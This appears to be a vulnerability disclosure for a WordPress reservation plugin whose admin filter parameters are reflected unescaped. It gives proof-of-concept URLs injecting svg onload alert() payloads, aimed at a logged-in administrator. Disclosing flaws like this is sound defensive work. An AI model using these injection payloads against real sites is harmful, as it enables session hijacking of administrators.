The plugin does not sanitise and escape numerous parameter before outputting them back in pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin
Make a logged in admin open
https://example.com/wp-admin/admin.php?page=sr-assets&filter_city_listing="><svg/onload=alert(/XSS/)>
https://example.com/wp-admin/admin.php?page=sr-reservations&filter_customer_fullname="><svg%2Fonload%3Dalert(%2FXSS-filter_customer_fullname%2F)>&filter_guest_fullname="><svg%2Fonload%3Dalert(%2FXSS-filter_guest_fullname%2F)>&filter_checkin_from="><svg/onload=alert(/XSS-filter_checkin_from/)>&filter_checkin_to="><svg/onload=alert(/XSS-filter_checkin_to/)>&filter_checkout_from="><svg/onload=alert(/XSS-filter_checkout_from/)>&filter_checkout_to="><svg/onload=alert(/XSS-filter_checkout_to/)>
Other pages & parameters are affected